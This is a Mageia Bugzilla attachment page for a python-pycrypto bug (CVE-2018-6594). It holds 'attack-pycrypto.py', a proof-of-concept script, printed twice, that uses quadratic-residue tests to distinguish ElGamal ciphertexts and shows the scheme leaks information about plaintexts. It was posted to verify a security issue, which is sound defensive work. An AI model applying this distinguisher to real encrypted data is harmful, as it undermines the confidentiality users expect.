Mageia Bugzilla – Attachment 10058 Details for
Bug 22693
python-pycrypto new security issue CVE-2018-6594
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
Log In
[x]
|
New Account
|
Forgot Password
python 2 and 3 compatible script
attack-pycrypto.py (text/plain), 1.46 KB, created by
Philippe Makowski
on 2018-03-19 11:11:39 CET
(
hide
)
Description:
python 2 and 3 compatible script
Filename:
MIME Type:
Creator:
Philippe Makowski
Created:
2018-03-19 11:11:39 CET
Size:
1.46 KB
patch
obsolete
>from Crypto.PublicKey import ElGamal >from Crypto import Random >import Crypto.Random.random >import sys > >PYTHON_MAJOR_VER = sys.version_info[0] >if PYTHON_MAJOR_VER == 3: > xrange = range > > >#Legendre for our specific setup with safe primes >def kronecker(x,p): > q = (p-1)/2 > return pow(int(x),int(q),int(p)) > >def findQNR(p): > r = Crypto.Random.random.randrange(2,p-1) > while kronecker(r,p) == 1: > r = Crypto.Random.random.randrange(2,p-1) > return r > >def findQR(p): > r = Crypto.Random.random.randrange(2,p-1) > return pow(int(r),2,int(p)) > >#Oracle; we use a 512 bit prime only for better performance >key = ElGamal.generate(512, Random.new().read) > >wrong = 0 >runs = 1000 >print("Running experiment...") >for i in xrange(runs): > #Adversary > plaintexts = dict() > plaintexts[0] = findQNR(key.p) > plaintexts[1] = findQR(key.p) > > #Oracle > challenge_bit = Crypto.Random.random.randrange(0,2) > r = Crypto.Random.random.randrange(1,key.p-1) > challenge = key.encrypt(plaintexts[challenge_bit], r) > > #Adversary > output = -1 > if (kronecker(key.y, key.p) == 1) or (kronecker(challenge[0], key.p) == 1): > if kronecker(challenge[1], key.p) == 1: > output = 1 > else: > output = 0 > else: > if kronecker(challenge[1], key.p) == 1: > output = 0 > else: > output = 1 > > if output != challenge_bit: > wrong = wrong + 1 > >print("Number of times adversary was wrong: %s" % wrong)
from Crypto.PublicKey import ElGamal from Crypto import Random import Crypto.Random.random import sys PYTHON_MAJOR_VER = sys.version_info[0] if PYTHON_MAJOR_VER == 3: xrange = range #Legendre for our specific setup with safe primes def kronecker(x,p): q = (p-1)/2 return pow(int(x),int(q),int(p)) def findQNR(p): r = Crypto.Random.random.randrange(2,p-1) while kronecker(r,p) == 1: r = Crypto.Random.random.randrange(2,p-1) return r def findQR(p): r = Crypto.Random.random.randrange(2,p-1) return pow(int(r),2,int(p)) #Oracle; we use a 512 bit prime only for better performance key = ElGamal.generate(512, Random.new().read) wrong = 0 runs = 1000 print("Running experiment...") for i in xrange(runs): #Adversary plaintexts = dict() plaintexts[0] = findQNR(key.p) plaintexts[1] = findQR(key.p) #Oracle challenge_bit = Crypto.Random.random.randrange(0,2) r = Crypto.Random.random.randrange(1,key.p-1) challenge = key.encrypt(plaintexts[challenge_bit], r) #Adversary output = -1 if (kronecker(key.y, key.p) == 1) or (kronecker(challenge[0], key.p) == 1): if kronecker(challenge[1], key.p) == 1: output = 1 else: output = 0 else: if kronecker(challenge[1], key.p) == 1: output = 0 else: output = 1 if output != challenge_bit: wrong = wrong + 1 print("Number of times adversary was wrong: %s" % wrong)
View Attachment As Raw
Actions:
View
Attachments on
bug 22693
:
10054
| 10058